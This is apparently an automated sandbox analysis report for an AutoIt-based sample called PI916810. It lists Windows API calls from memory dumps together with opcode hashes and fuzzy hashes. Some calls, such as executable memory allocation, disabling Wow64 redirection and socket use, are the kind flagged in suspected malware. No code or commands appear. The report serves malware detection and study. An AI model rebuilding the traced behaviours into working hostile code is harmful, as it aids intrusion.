• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004B9834
• __itow.LIBCMT ref: 004B984C
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004B9874
• __itow.LIBCMT ref: 004B9885
Similarity
• API ID: MessageSend$__itow$_memmove
• String ID:
• API String ID: 2983881199-0
APIs
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0046134D
• SelectObject.GDI32(?,00000000), ref: 0046135C
• BeginPath.GDI32(?), ref: 00461373
• SelectObject.GDI32(?,00000000), ref: 0046139C
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memcmp
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2931989736-0
                                                                                                                                                                            • Opcode ID: 30da597d7b2bf8d7dc9694d0a965782bf2eee304027fa5af695bbecf86c8dbf4
                                                                                                                                                                            • Instruction ID: a5c94c4987d5f39d2df10e97fc5a8ba7787ae751cb4ad86293c15829baf9111f
                                                                                                                                                                            • Opcode Fuzzy Hash: 30da597d7b2bf8d7dc9694d0a965782bf2eee304027fa5af695bbecf86c8dbf4
                                                                                                                                                                            • Instruction Fuzzy Hash: 6801967160510A7BE204B6295DC2FFF735C9F11398B144417FE04B6253FA5C9E1286BD
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004C4D5C
                                                                                                                                                                            • __beginthreadex.LIBCMT ref: 004C4D7A
                                                                                                                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 004C4D8F
                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 004C4DA5
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004C4DAC
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
• String ID:
• API String ID: 3824534824-0
• Opcode ID: a6a7bded2a2b3272e5279a3bfb078a90a01dd45246e232c70eb8763a1a7cc27a
• Instruction ID: a012d2972ede270c4be1547c9baa75e878459c4d1a0fb8e897bcc5d1966540c2
• Opcode Fuzzy Hash: a6a7bded2a2b3272e5279a3bfb078a90a01dd45246e232c70eb8763a1a7cc27a
• Instruction Fuzzy Hash: D511487A904248FFC710ABA89C44F9F7FACEB85320F14426AF815D3351C6748D0887A0
APIs
• GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004B8766
• GetLastError.KERNEL32(?,004B822A,?,?,?), ref: 004B8770
• GetProcessHeap.KERNEL32(00000008,?,?,004B822A,?,?,?), ref: 004B877F
• HeapAlloc.KERNEL32(00000000,?,004B822A,?,?,?), ref: 004B8786
• GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 004B879D
Similarity
• API ID: HeapObjectSecurityUser$AllocErrorLastProcess
• String ID:
• API String ID: 842720411-0
• Opcode ID: 0d0344e01c1747a812ea138b94045f826f1e99e5cff206ee6b463aeb398ed8a4
• Instruction ID: bfeef8a79ef5b9fef454e6ccb675f672090765816f8a6e24c04960404afa4d54
• Opcode Fuzzy Hash: 0d0344e01c1747a812ea138b94045f826f1e99e5cff206ee6b463aeb398ed8a4
• Instruction Fuzzy Hash: 1B014B75200248EFDB204FB6DC88DABBBACEF8A355720043AF849C6260DA318C05CA74
APIs
• QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004C5502
• QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 004C5510
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 004C5518
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 004C5522
• Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004C555E
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
• Opcode ID: fdb6b472ae0d6d6383047bd4180c675fc6ee6c0c33c1d2f2b68a88557bff4ae9
• Instruction ID: 34e454d2a920b7a4976196ccaa5e69d375d5a484baf47d3e15c8b7ff15957ed3
• Opcode Fuzzy Hash: fdb6b472ae0d6d6383047bd4180c675fc6ee6c0c33c1d2f2b68a88557bff4ae9
• Instruction Fuzzy Hash: 6C015235D0091DEBCF00DFE5E888AEDBB78FB09701F44006AD501B6245DB346994C7A9
APIs
• CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004B758C,80070057,?,?,?,004B799D), ref: 004B766F
• ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004B758C,80070057,?,?), ref: 004B768A
• lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004B758C,80070057,?,?), ref: 004B7698
• CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004B758C,80070057,?), ref: 004B76A8
• CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004B758C,80070057,?,?), ref: 004B76B4
Similarity
• API ID: From$Prog$FreeStringTasklstrcmpi
• String ID:
• API String ID: 3897988419-0
• Opcode ID: f5cc9ca8601f4d7bc67b8fb5942d3ee31317981d888d80436ddd138aaa16552e
• Instruction ID: d6d6fff3dcb46f38122be31d3c2d8bdf446edefb4b1e966356b0df469ef4664b
• Opcode Fuzzy Hash: f5cc9ca8601f4d7bc67b8fb5942d3ee31317981d888d80436ddd138aaa16552e
• Instruction Fuzzy Hash: BF018472601604BBDB105F58DC84BEA7BADEB84761F144039FD04D6312E735DE459BB4
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004B8608
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004B8612
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004B8621
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004B8628
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004B863E
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
• Opcode ID: dba756f4cc5bf7414aa7526cd404043e8522cfa1d6abcb1aadd42dd64c523cea
• Instruction ID: 97a3fd6b977c56c785c12db438fa5967717ebdefb170e83558ce5ba7b8d05f01
• Opcode Fuzzy Hash: dba756f4cc5bf7414aa7526cd404043e8522cfa1d6abcb1aadd42dd64c523cea
• Instruction Fuzzy Hash: 9FF06231201244AFEB100FA9DCCDEAB3BACEF8A754B04443AF945DA291CB759C45DA74
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 004B8669
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 004B8673
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004B8682
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 004B8689
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004B869F
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 44706859-0
                                                                                                                                                                            • Opcode ID: d27e6e933a04353507bfa27b681827b404ab90a28f145a121b859289b1f6720d
                                                                                                                                                                            • Instruction ID: 002d33b02a21959e28d578b9c6cb6ed7dd422bd22ab922daf47c73541a22c166
                                                                                                                                                                            • Opcode Fuzzy Hash: d27e6e933a04353507bfa27b681827b404ab90a28f145a121b859289b1f6720d
                                                                                                                                                                            • Instruction Fuzzy Hash: 90F0C270200344AFEB111FA4ECC8EA73BACEF8A754B10043AF905CA2A1DB70DD15DA74
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 004BC6BA
                                                                                                                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 004BC6D1
                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 004BC6E9
                                                                                                                                                                            • KillTimer.USER32(?,0000040A), ref: 004BC705
                                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 004BC71F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3741023627-0
                                                                                                                                                                            • Opcode ID: f1136287736d35f7edbab2490e42f369353ab90eb1e8c12b8c86eaa697287523
                                                                                                                                                                            • Instruction ID: 6650ebbdc84d159519f484c1eed073e198cd576882c4e30db1a963bd10506655
                                                                                                                                                                            • Opcode Fuzzy Hash: f1136287736d35f7edbab2490e42f369353ab90eb1e8c12b8c86eaa697287523
                                                                                                                                                                            • Instruction Fuzzy Hash: B0016230500704ABEB215B60DDCEF9677B8FF00705F00066AF646A55E1DBF4A9598F99
                                                                                                                                                                            APIs
                                                                                                                                                                            • EndPath.GDI32(?), ref: 004613BF
                                                                                                                                                                            • StrokeAndFillPath.GDI32(?,?,0049BAD8,00000000,?), ref: 004613DB
                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 004613EE
                                                                                                                                                                            • DeleteObject.GDI32 ref: 00461401
                                                                                                                                                                            • StrokePath.GDI32(?), ref: 0046141C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2625713937-0
                                                                                                                                                                            • Opcode ID: 1bfbce77f60dd86b4539d836ec562135f1edd76e0e07a17bc54f0dc701577e2d
                                                                                                                                                                            • Instruction ID: 2f9285e703158a74b4a497f1ee71d35aa9a39065a0e42f7c5c96a4a6b87abba8
                                                                                                                                                                            • Opcode Fuzzy Hash: 1bfbce77f60dd86b4539d836ec562135f1edd76e0e07a17bc54f0dc701577e2d
                                                                                                                                                                            • Instruction Fuzzy Hash: E3F0EC30004348EBDB215F26EC8D7693FE4AB12326F08C236E829491F2D735499AEF59
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00480FF6: std::exception::exception.LIBCMT ref: 0048102C
                                                                                                                                                                              • Part of subcall function 00480FF6: __CxxThrowException@8.LIBCMT ref: 00481041
                                                                                                                                                                              • Part of subcall function 00467F41: _memmove.LIBCMT ref: 00467F82
                                                                                                                                                                              • Part of subcall function 00467BB1: _memmove.LIBCMT ref: 00467C0B
                                                                                                                                                                            • __swprintf.LIBCMT ref: 0047302D
                                                                                                                                                                            Strings
                                                                                                                                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00472EC6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                                            • API String ID: 1943609520-557222456
                                                                                                                                                                            • Opcode ID: 8cb126a9fbc59620af581efdf2f6fd2bd3bbf676bbde0a013ecb2e81cc3b11e6
                                                                                                                                                                            • Instruction ID: 2627281165f30693618b66fd0ee1849a3f3a9e5f8f9c79019ca16503bfc17b4b
                                                                                                                                                                            • Opcode Fuzzy Hash: 8cb126a9fbc59620af581efdf2f6fd2bd3bbf676bbde0a013ecb2e81cc3b11e6
                                                                                                                                                                            • Instruction Fuzzy Hash: D491AF711083419FC718EF25D885CAFB7A8EF95708F04491FF4859B2A1EA78EE44CB5A
                                                                                                                                                                            APIs
                                                                                                                                                                            • OleSetContainedObject.OLE32(?,00000001), ref: 004BB981
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ContainedObject
                                                                                                                                                                            • String ID: AutoIt3GUI$Container$%O
                                                                                                                                                                            • API String ID: 3565006973-335713367
                                                                                                                                                                            • Opcode ID: 65338de051067730d51e77f87aa8f90794c1ee36b4945818aad6bb01ba7176de
                                                                                                                                                                            • Instruction ID: ad76182ad7b40cb0673536563351b4304104c40d17dbedc3b944ed07a3922dfa
                                                                                                                                                                            • Opcode Fuzzy Hash: 65338de051067730d51e77f87aa8f90794c1ee36b4945818aad6bb01ba7176de
                                                                                                                                                                            • Instruction Fuzzy Hash: 17914D706006019FDB64DF24C884AAABBF9FF49710F14856EF945CB391DBB4E841CBA4
                                                                                                                                                                            APIs
                                                                                                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 004852DD
                                                                                                                                                                              • Part of subcall function 00490340: __87except.LIBCMT ref: 0049037B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorHandling__87except__start
                                                                                                                                                                            • String ID: pow
                                                                                                                                                                            • API String ID: 2905807303-2276729525
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID:
• String ID: #$+
• API String ID: 0-2552117581
Similarity
• API ID: _memmove$_free
• String ID: OaG
• API String ID: 2620147621-282697018
Similarity
• API ID: _memset$_memmove
• String ID: ERCP
• API String ID: 2532777613-1384759551
APIs
• SendMessageW.USER32(00000000,00001009,00000000,?), ref: 004E76D0
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 004E76E4
• SendMessageW.USER32(?,00001002,00000000,?), ref: 004E7708
Similarity
• API ID: MessageSend$Window
• String ID: SysMonthCal32
• API String ID: 2326795674-1439706946
APIs
• SendMessageW.USER32(00000000,00000180,00000000,?), ref: 004E6FAA
• SendMessageW.USER32(?,00000186,00000000,00000000), ref: 004E6FBA
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 004E6FDF
Similarity
• API ID: MessageSend$MoveWindow
• String ID: Listbox
• API String ID: 3315199576-2633736733
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 004E79E1
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 004E79F6
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 004E7A03
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00464C2E), ref: 00464CA3
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00464CB5
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                            • API String ID: 2574300362-192647395
                                                                                                                                                                            • Opcode ID: 65afdbd3538ad9d25f1b0b0bb2112d775baf46cf21b73b67cbd0eab769988d2b
                                                                                                                                                                            • Instruction ID: 8c5be96b58369dca8059633c716b0d091335f8b5f9a2d3c270d1ea944c04275f
                                                                                                                                                                            • Opcode Fuzzy Hash: 65afdbd3538ad9d25f1b0b0bb2112d775baf46cf21b73b67cbd0eab769988d2b
                                                                                                                                                                            • Instruction Fuzzy Hash: ADD0C230500727CFCB208F31C948602B2D5AF40741B21C83F9881CA250E678D884C618
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00464D2E,?,00464F4F,?,005262F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00464D6F
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00464D81
                                                                                                                                                                            Strings
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                            • API String ID: 2574300362-3689287502
                                                                                                                                                                            • Opcode ID: 04997f603bdc33b7b21a42a19a5e60ce8605ac917066f05c32fe7c67f25027b7
                                                                                                                                                                            • Instruction ID: 2ce29cca64eaaa7db7315b08db592a9df6995f32e48e251c94ba5e7fb53c4568
                                                                                                                                                                            • Opcode Fuzzy Hash: 04997f603bdc33b7b21a42a19a5e60ce8605ac917066f05c32fe7c67f25027b7
                                                                                                                                                                            • Instruction Fuzzy Hash: 53D0C730900753CFDB208F31C848202BAE8BF083A2B20C93E9482CA290E678D880CA18
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00464CE1,?), ref: 00464DA2
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00464DB4
                                                                                                                                                                            Strings
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                            • API String ID: 2574300362-1355242751
                                                                                                                                                                            • Opcode ID: b82ded3eaed6affac03bc95eebd2f4a3c239721ecd11d3f175977acae516577f
                                                                                                                                                                            • Instruction ID: da0e260a17bf1a879eccdd4dd48ca18219b978e2f7a35cdba5b22487f7edcf4d
                                                                                                                                                                            • Opcode Fuzzy Hash: b82ded3eaed6affac03bc95eebd2f4a3c239721ecd11d3f175977acae516577f
                                                                                                                                                                            • Instruction Fuzzy Hash: B4D0C770900713CFDB208F31C848A86B6E4AF08341B10C83ED8C2CA250E778E880CA18
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,004E12C1), ref: 004E1080
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 004E1092
                                                                                                                                                                            Strings
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                            • API String ID: 2574300362-4033151799
                                                                                                                                                                            • Opcode ID: f84ef9d7e64c0e75eee784603dce8e779ae71954b200550c95e3626ec0068127
                                                                                                                                                                            • Instruction ID: 9f3ea3ae231da1f580545cdb64f5d1eb76c7091af01db71c74e090b86b8aa0ed
                                                                                                                                                                            • Opcode Fuzzy Hash: f84ef9d7e64c0e75eee784603dce8e779ae71954b200550c95e3626ec0068127
                                                                                                                                                                            • Instruction Fuzzy Hash: 9BD0C230440752CFE7204F31C858957B6E4BF44352B008D3EA4D5CA660D7B4C8C4C600
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000001,004D9009,?,004EF910), ref: 004D9403
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 004D9415
                                                                                                                                                                            Strings
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                            • API String ID: 2574300362-199464113
                                                                                                                                                                            • Opcode ID: dec2eb343c78d832b23aacc33beb240dc7890ce5390d4357cfbc251fcb800c89
                                                                                                                                                                            • Instruction ID: 5eda7b0c38c5db462060d04006c64da6dcfd2db5d27427e24b61010f9501e00c
                                                                                                                                                                            • Opcode Fuzzy Hash: dec2eb343c78d832b23aacc33beb240dc7890ce5390d4357cfbc251fcb800c89
                                                                                                                                                                            • Instruction Fuzzy Hash: C9D0C730604727CFD7208F31C948203B6E4AF00342B10C83FA482EAA52E778CC84CA54
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 831fcc731e9eecf636a32ae7898678acf793a237c17c453998403f85b0223d8f
                                                                                                                                                                            • Instruction ID: 1d3a90f20c4f36e8de5732afd491739d329349a8656a77bce7f0ba2a8c1627a3
                                                                                                                                                                            • Opcode Fuzzy Hash: 831fcc731e9eecf636a32ae7898678acf793a237c17c453998403f85b0223d8f
                                                                                                                                                                            • Instruction Fuzzy Hash: E4C19074A04216EFDB14DFA4C884EAEB7B5FF88710B10859AE805EB351D734EE41CBA4
                                                                                                                                                                            APIs
                                                                                                                                                                            • CharLowerBuffW.USER32(?,?), ref: 004DE3D2
                                                                                                                                                                            • CharLowerBuffW.USER32(?,?), ref: 004DE415
                                                                                                                                                                              • Part of subcall function 004DDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 004DDAD9
                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 004DE615
                                                                                                                                                                            • _memmove.LIBCMT ref: 004DE628
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3659485706-0
APIs
• CoInitialize.OLE32(00000000), ref: 004D83D8
• CoUninitialize.OLE32 ref: 004D83E3
  • Part of subcall function 004BDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 004BDAC5
• VariantInit.OLEAUT32(?), ref: 004D83EE
• VariantClear.OLEAUT32(?), ref: 004D86BF
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
Similarity
• API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
• String ID:
• API String ID: 780911581-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
Similarity
• API ID: Variant$AllocClearCopyInitString
• String ID:
• API String ID: 2808897238-0
APIs
• GetWindowRect.USER32(00D3E300,?), ref: 004E9AD2
• ScreenToClient.USER32(00000002,00000002), ref: 004E9B05
• MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 004E9B72
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 004D6CE4
• WSAGetLastError.WSOCK32(00000000), ref: 004D6CF4
  • Part of subcall function 00469997: __itow.LIBCMT ref: 004699C2
  • Part of subcall function 00469997: __swprintf.LIBCMT ref: 00469A0C
